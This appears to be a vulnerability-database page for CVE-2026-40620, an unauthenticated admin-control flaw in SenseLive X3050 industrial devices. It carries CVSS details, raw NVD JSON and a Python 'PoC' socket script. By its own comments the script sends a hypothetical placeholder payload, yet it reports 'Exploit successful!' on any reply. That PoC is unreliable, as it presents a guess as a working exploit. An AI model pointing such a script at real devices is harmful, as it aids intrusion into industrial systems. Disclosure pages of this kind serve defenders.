Security Vulnerability Report
中文
CVE-2026-40620 CVSS 9.8 CRITICAL

CVE-2026-40620

Published: 2026-04-24 00:16:29
Last Modified: 2026-04-28 19:32:57
Source: [email protected]

Description

A vulnerability in SenseLive X3050’s embedded management service allows full administrative control to be established without any form of authentication or authorization on the SenseLive config application. The service accepts management connections from any reachable host, enabling unrestricted modification of critical configuration parameters, operational modes, and device state through a vendor-supplied or compatible client.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:senselive:x3500_firmware:1.523:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:senselive:x3500:-:*:*:*:*:*:*:* - NOT VULNERABLE
SenseLive X3050

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket def exploit_poc(target_ip, target_port): """ PoC for CVE-2026-40620: SenseLive X3050 Authentication Bypass. This script attempts to connect to the management service and send a command. """ try: # Establish TCP connection to the target device print(f"[*] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) print("[+] Connection established!") # Construct a malicious administrative command # Note: The actual protocol bytes need to be reversed engineered from the vendor client # This is a hypothetical representation of a 'Get Config' or 'Change Admin' command payload = b"\x00\x01\x02ADMIN_CMD\x00\x00\x00" print(f"[*] Sending payload: {payload}") s.send(payload) # Receive response response = s.recv(1024) print(f"[+] Received response: {response}") if response: print("[!] Exploit successful! Device accepted command without authentication.") else: print("[-] No response received.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual IP and Port of the vulnerable device target = "192.168.1.100" port = 8080 exploit_poc(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40620", "sourceIdentifier": "[email protected]", "published": "2026-04-24T00:16:28.690", "lastModified": "2026-04-28T19:32:56.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in SenseLive X3050’s embedded management service allows full administrative control to be established without any form of authentication or authorization on the SenseLive config application. The service accepts management connections from any reachable host, enabling unrestricted modification of critical configuration parameters, operational modes, and device state through a vendor-supplied or compatible client."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:senselive:x3500_firmware:1.523:*:*:*:*:*:*:*", "matchCriteriaId": "F0A28FFE-3268-48DC-BB85-77009904F0D0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:senselive:x3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "42742F99-96EF-412E-9D7C-8C2155C3DCE1"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-111-12.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://senselive.io/contact", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-111-12", "source": "[email protected]", "tags": ["US Government Resource"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.